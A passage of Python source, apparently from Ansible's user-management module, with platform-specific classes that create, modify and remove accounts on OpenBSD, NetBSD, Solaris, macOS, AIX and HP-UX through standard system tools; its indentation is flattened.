cmd.append('-L')
cmd.append(self.login_class)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.expires is not None:
current_expires = int(self.user_password()[1])
# If expiration is negative or zero and the current expiration is greater than zero, disable expiration.
# In OpenBSD, setting expiration to zero disables expiration. It does not expire the account.
if self.expires <= time.gmtime(0):
if current_expires > 0:
cmd.append('-e')
cmd.append('0')
else:
# Convert days since Epoch to seconds since Epoch as struct_time
current_expire_date = time.gmtime(current_expires)
# Current expires is negative or we compare year, month, and day only
if current_expires <= 0 or current_expire_date[:3] != self.expires[:3]:
cmd.append('-e')
cmd.append(str(calendar.timegm(self.expires)))
# modify the user if cmd will do anything
if cmd_len != len(cmd):
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password in a second command
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
# we have to lock/unlock the password in a distinct command
if self.password_lock and not info[1].startswith('*LOCKED*'):
cmd = [
self.module.get_bin_path('pw', True),
'lock',
self.name
]
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
return self.execute_command(cmd)
elif self.password_lock is False and info[1].startswith('*LOCKED*'):
cmd = [
self.module.get_bin_path('pw', True),
'unlock',
self.name
]
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
return self.execute_command(cmd)
return (rc, out, err)
class DragonFlyBsdUser(FreeBsdUser):
"""
This is a DragonFlyBSD User manipulation class - it inherits the
FreeBsdUser class behaviors, such as using the pw command to
manipulate the user database, followed by the chpass command
to change the password.
"""
platform = 'DragonFly'
class OpenBSDUser(User):
"""
    This is an OpenBSD User manipulation class.
Main differences are that OpenBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'OpenBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None and self.password != '*':
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups_option = '-S'
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_option = '-G'
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append(groups_option)
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
userinfo_cmd = [self.module.get_bin_path('userinfo', True), self.name]
(rc, out, err) = self.execute_command(userinfo_cmd, obey_checkmode=False)
for line in out.splitlines():
tokens = line.split()
if tokens[0] == 'class' and len(tokens) == 2:
user_login_class = tokens[1]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.password_lock and not info[1].startswith('*'):
cmd.append('-Z')
elif self.password_lock is False and info[1].startswith('*'):
cmd.append('-U')
if self.update_password == 'always' and self.password is not None \
and self.password != '*' and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
class NetBSDUser(User):
"""
This is a NetBSD User manipulation class.
Main differences are that NetBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'NetBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups = set(current_groups).union(groups)
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
if self.password_lock and not info[1].startswith('*LOCKED*'):
cmd.append('-C yes')
elif self.password_lock is False and info[1].startswith('*LOCKED*'):
cmd.append('-C no')
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
class SunOS(User):
"""
This is a SunOS User manipulation class - The main difference between
this class and the generic user class is that Solaris-type distros
don't support the concept of a "system" account and we need to
edit the /etc/shadow file manually to set a password. (Ugh)
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
- user_info()
"""
platform = 'SunOS'
distribution = None
SHADOWFILE = '/etc/shadow'
USER_ATTR = '/etc/user_attr'
def get_password_defaults(self):
# Read password aging defaults
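        # Illustrative /etc/default/passwd fragment this parser handles (values are assumed):
        #   MINWEEKS=1
        #   MAXWEEKS=8
        #   WARNWEEKS=2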
try:
minweeks = ''
maxweeks = ''
warnweeks = ''
with open("/etc/default/passwd", 'r') as f:
for line in f:
line = line.strip()
if (line.startswith('#') or line == ''):
continue
m = re.match(r'^([^#]*)#(.*)$', line)
if m: # The line contains a hash / comment
line = m.group(1)
key, value = line.split('=')
if key == "MINWEEKS":
minweeks = value.rstrip('\n')
elif key == "MAXWEEKS":
maxweeks = value.rstrip('\n')
elif key == "WARNWEEKS":
warnweeks = value.rstrip('\n')
except Exception as err:
self.module.fail_json(msg="failed to read /etc/default/passwd: %s" % to_native(err))
return (minweeks, maxweeks, warnweeks)
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.profile is not None:
cmd.append('-P')
cmd.append(self.profile)
if self.authorization is not None:
cmd.append('-A')
cmd.append(self.authorization)
if self.role is not None:
cmd.append('-R')
cmd.append(self.role)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
if not self.module.check_mode:
# we have to set the password by editing the /etc/shadow file
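            # Standard shadow(4) field layout assumed by the index arithmetic below:
            #   name:password:lastchg:min:max:warn:inactive:expire:flag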
if self.password is not None:
self.backup_shadow()
minweeks, maxweeks, warnweeks = self.get_password_defaults()
try:
lines = []
with open(self.SHADOWFILE, 'rb') as f:
for line in f:
line = to_native(line, errors='surrogate_or_strict')
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() // 86400))
if minweeks:
try:
fields[3] = str(int(minweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
if maxweeks:
try:
fields[4] = str(int(maxweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
if warnweeks:
try:
fields[5] = str(int(warnweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
line = ':'.join(fields)
lines.append('%s\n' % line)
with open(self.SHADOWFILE, 'w+') as f:
f.writelines(lines)
except Exception as err:
self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups.update(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.profile is not None and info[7] != self.profile:
cmd.append('-P')
cmd.append(self.profile)
if self.authorization is not None and info[8] != self.authorization:
cmd.append('-A')
cmd.append(self.authorization)
if self.role is not None and info[9] != self.role:
cmd.append('-R')
cmd.append(self.role)
# modify the user if cmd will do anything
if cmd_len != len(cmd):
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password by editing the /etc/shadow file
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
self.backup_shadow()
(rc, out, err) = (0, '', '')
if not self.module.check_mode:
minweeks, maxweeks, warnweeks = self.get_password_defaults()
try:
lines = []
with open(self.SHADOWFILE, 'rb') as f:
for line in f:
line = to_native(line, errors='surrogate_or_strict')
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() // 86400))
if minweeks:
fields[3] = str(int(minweeks) * 7)
if maxweeks:
fields[4] = str(int(maxweeks) * 7)
if warnweeks:
fields[5] = str(int(warnweeks) * 7)
line = ':'.join(fields)
lines.append('%s\n' % line)
with open(self.SHADOWFILE, 'w+') as f:
f.writelines(lines)
rc = 0
except Exception as err:
self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
return (rc, out, err)
def user_info(self):
info = super(SunOS, self).user_info()
if info:
info += self._user_attr_info()
return info
def _user_attr_info(self):
info = [''] * 3
with open(self.USER_ATTR, 'r') as file_handler:
for line in file_handler:
lines = line.strip().split('::::')
if lines[0] == self.name:
tmp = dict(x.split('=') for x in lines[1].split(';'))
info[0] = tmp.get('profiles', '')
info[1] = tmp.get('auths', '')
info[2] = tmp.get('roles', '')
return info
class DarwinUser(User):
"""
This is a Darwin macOS User manipulation class.
Main differences are that Darwin:-
- Handles accounts in a database managed by dscl(1)
- Has no useradd/groupadd
- Does not create home directories
- User password must be cleartext
- UID must be given
    - System users must be under 500
This overrides the following methods from the generic class:-
- user_exists()
- create_user()
- remove_user()
- modify_user()
"""
platform = 'Darwin'
distribution = None
SHADOWFILE = None
dscl_directory = '.'
fields = [
('comment', 'RealName'),
('home', 'NFSHomeDirectory'),
('shell', 'UserShell'),
('uid', 'UniqueID'),
('group', 'PrimaryGroupID'),
('hidden', 'IsHidden'),
]
def __init__(self, module):
super(DarwinUser, self).__init__(module)
        # make the user hidden if option is set or defer to system option
if self.hidden is None:
if self.system:
self.hidden = 1
elif self.hidden:
self.hidden = 1
else:
self.hidden = 0
# add hidden to processing if set
if self.hidden is not None:
self.fields.append(('hidden', 'IsHidden'))
def _get_dscl(self):
return [self.module.get_bin_path('dscl', True), self.dscl_directory]
def _list_user_groups(self):
cmd = self._get_dscl()
cmd += ['-search', '/Groups', 'GroupMembership', self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
groups = []
for line in out.splitlines():
if line.startswith(' ') or line.startswith(')'):
continue
groups.append(line.split()[0])
return groups
def _get_user_property(self, property):
        '''Return user PROPERTY as given by dscl(1) read, or None if not found.'''
cmd = self._get_dscl()
cmd += ['-read', '/Users/%s' % self.name, property]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
return None
# from dscl(1)
# if property contains embedded spaces, the list will instead be
# displayed one entry per line, starting on the line after the key.
lines = out.splitlines()
# sys.stderr.write('*** |%s| %s -> %s\n' % (property, out, lines))
if len(lines) == 1:
return lines[0].split(': ')[1]
else:
if len(lines) > 2:
return '\n'.join([lines[1].strip()] + lines[2:])
else:
if len(lines) == 2:
return lines[1].strip()
else:
return None
def _get_next_uid(self, system=None):
'''
        Return the next available uid. If system=True, then
        the uid should be below 500, if possible.
'''
cmd = self._get_dscl()
cmd += ['-list', '/Users', 'UniqueID']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
if rc != 0:
self.module.fail_json(
msg="Unable to get the next available uid",
rc=rc,
out=out,
err=err
)
max_uid = 0
max_system_uid = 0
for line in out.splitlines():
current_uid = int(line.split(' ')[-1])
if max_uid < current_uid:
max_uid = current_uid
if max_system_uid < current_uid and current_uid < 500:
max_system_uid = current_uid
if system and (0 < max_system_uid < 499):
return max_system_uid + 1
return max_uid + 1
def _change_user_password(self):
'''Change password for SELF.NAME against SELF.PASSWORD.
Please note that password must be cleartext.
'''
        # some documentation on how passwords are stored on OSX:
# http://blog.lostpassword.com/2012/07/cracking-mac-os-x-lion-accounts-passwords/
# http://null-byte.wonderhowto.com/how-to/hack-mac-os-x-lion-passwords-0130036/
# http://pastebin.com/RYqxi7Ca
# on OSX 10.8+ hash is SALTED-SHA512-PBKDF2
# https://pythonhosted.org/passlib/lib/passlib.hash.pbkdf2_digest.html
# https://gist.github.com/nueh/8252572
cmd = self._get_dscl()
if self.password:
cmd += ['-passwd', '/Users/%s' % self.name, self.password]
else:
cmd += ['-create', '/Users/%s' % self.name, 'Password', '*']
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Error when changing password', err=err, out=out, rc=rc)
return (rc, out, err)
def _make_group_numerical(self):
        '''Convert SELF.GROUP to its stringified numerical value suitable for dscl.'''
if self.group is None:
self.group = 'nogroup'
try:
self.group = grp.getgrnam(self.group).gr_gid
except KeyError:
self.module.fail_json(msg='Group "%s" not found. Try to create it first using "group" module.' % self.group)
# We need to pass a string to dscl
self.group = str(self.group)
def __modify_group(self, group, action):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwise 'remove' is assumed. '''
if action == 'add':
option = '-a'
else:
option = '-d'
cmd = ['dseditgroup', '-o', 'edit', option, self.name, '-t', 'user', group]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot %s user "%s" to group "%s".'
% (action, self.name, group), err=err, out=out, rc=rc)
return (rc, out, err)
def _modify_group(self):
        '''Synchronize SELF.NAME's supplementary group membership with
        SELF.GROUPS, honoring SELF.APPEND. Returns (rc, err, out, changed). '''
rc = 0
out = ''
err = ''
changed = False
current = set(self._list_user_groups())
if self.groups is not None:
target = set(self.groups.split(','))
else:
target = set([])
if self.append is False:
for remove in current - target:
(_rc, _err, _out) = self.__modify_group(remove, 'delete')
                rc += _rc
out += _out
err += _err
changed = True
for add in target - current:
(_rc, _err, _out) = self.__modify_group(add, 'add')
rc += _rc
out += _out
err += _err
changed = True
return (rc, err, out, changed)
def _update_system_user(self):
        '''Hide or show the user on the login window according to SELF.SYSTEM.
Returns 0 if a change has been made, None otherwise.'''
plist_file = '/Library/Preferences/com.apple.loginwindow.plist'
# http://support.apple.com/kb/HT5017?viewlocale=en_US
cmd = ['defaults', 'read', plist_file, 'HiddenUsersList']
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
# returned value is
# (
# "_userA",
# "_UserB",
# userc
# )
hidden_users = []
for x in out.splitlines()[1:-1]:
try:
x = x.split('"')[1]
except IndexError:
x = x.strip()
hidden_users.append(x)
if self.system:
if self.name not in hidden_users:
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array-add', self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
                    self.module.fail_json(msg='Cannot add user "%s" to hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
else:
if self.name in hidden_users:
del (hidden_users[hidden_users.index(self.name)])
cmd = ['defaults', 'write', plist_file, 'HiddenUsersList', '-array'] + hidden_users
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot remove user "%s" from hidden user list.' % self.name, err=err, out=out, rc=rc)
return 0
def user_exists(self):
        '''Check if SELF.NAME is a known user on the system.'''
cmd = self._get_dscl()
cmd += ['-list', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd, obey_checkmode=False)
return rc == 0
def remove_user(self):
'''Delete SELF.NAME. If SELF.FORCE is true, remove its home directory.'''
info = self.user_info()
cmd = self._get_dscl()
cmd += ['-delete', '/Users/%s' % self.name]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot delete user "%s".' % self.name, err=err, out=out, rc=rc)
if self.force:
if os.path.exists(info[5]):
shutil.rmtree(info[5])
out += "Removed %s" % info[5]
return (rc, out, err)
def create_user(self, command_name='dscl'):
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name]
        (rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot create user "%s".' % self.name, err=err, out=out, rc=rc)
self._make_group_numerical()
if self.uid is None:
self.uid = str(self._get_next_uid(self.system))
# Homedir is not created by default
if self.create_home:
if self.home is None:
self.home = '/Users/%s' % self.name
if not self.module.check_mode:
if not os.path.exists(self.home):
os.makedirs(self.home)
self.chown_homedir(int(self.uid), int(self.group), self.home)
# dscl sets shell to /usr/bin/false when UserShell is not specified
# so set the shell to /bin/bash when the user is not a system user
if not self.system and self.shell is None:
self.shell = '/bin/bash'
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
                (rc, _out, _err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot add property "%s" to user "%s".' % (field[0], self.name), err=err, out=out, rc=rc)
out += _out
err += _err
if rc != 0:
                return (rc, out, err)
        (rc, _out, _err) = self._change_user_password()
out += _out
err += _err
self._update_system_user()
# here we don't care about change status since it is a creation,
# thus changed is always true.
if self.groups:
(rc, _out, _err, changed) = self._modify_group()
out += _out
err += _err
        return (rc, out, err)
def modify_user(self):
changed = None
out = ''
err = ''
if self.group:
self._make_group_numerical()
for field in self.fields:
if field[0] in self.__dict__ and self.__dict__[field[0]]:
current = self._get_user_property(field[1])
if current is None or current != self.__dict__[field[0]]:
cmd = self._get_dscl()
cmd += ['-create', '/Users/%s' % self.name, field[1], self.__dict__[field[0]]]
                (rc, _out, _err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(
msg='Cannot update property "%s" for user "%s".'
% (field[0], self.name), err=err, out=out, rc=rc)
changed = rc
out += _out
err += _err
if self.update_password == 'always' and self.password is not None:
            (rc, _out, _err) = self._change_user_password()
out += _out
err += _err
changed = rc
if self.groups:
(rc, _out, _err, _changed) = self._modify_group()
out += _out
err += _err
if _changed is True:
changed = rc
rc = self._update_system_user()
if rc == 0:
changed = rc
return (changed, out, err)
class AIX(User):
"""
    This is an AIX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'AIX'
distribution = None
SHADOWFILE = '/etc/security/passwd'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
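        # (Assumption from AIX documentation: '-e' tells chpasswd the supplied
        # password is already encrypted, and '-c' clears password flags such as
        # ADMCHG so the user is not forced to change it at next login.)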
if self.password is not None:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
# skip if no changes to be made
if len(cmd) == 1:
(rc, out, err) = (None, '', '')
else:
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
# set password with chpasswd
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = []
cmd.append(self.module.get_bin_path('chpasswd', True))
cmd.append('-e')
cmd.append('-c')
(rc2, out2, err2) = self.execute_command(cmd, data="%s:%s" % (self.name, self.password))
else:
(rc2, out2, err2) = (None, '', '')
if rc is not None:
return (rc, out + out2, err + err2)
else:
return (rc2, out + out2, err + err2)
class HPUX(User):
"""
    This is an HP-UX User manipulation class.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'HP-UX'
distribution = None
SHADOWFILE = '/etc/shadow'
def create_user(self):
cmd = ['/usr/sam/lbin/useradd.sam']
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user(self):
cmd = ['/usr/sam/lbin/userdel.sam']
if self.force:
cmd.append('-F')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = ['/usr/sam/lbin/usermod.sam']
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-F')
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def main():
ssh_defaults = dict(
bits=0,
type='rsa',
passphrase=None,
comment='ansible-generated on %s' % socket.gethostname()
)
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default='present', choices=['absent', 'present']),
name=dict(type='str', required=True, aliases=['user']),
uid=dict(type='int'),
non_unique=dict(type='bool', default=False),
group=dict(type='str'),
groups=dict(type='list'),
comment=dict(type='str'),
home=dict(type='path'),
shell=dict(type='str'),
password=dict(type='str', no_log=True),
login_class=dict(type='str'),
# following options are specific to macOS
hidden=dict(type='bool'),
# following options are specific to selinux
seuser=dict(type='str'),
# following options are specific to userdel
force=dict(type='bool', default=False),
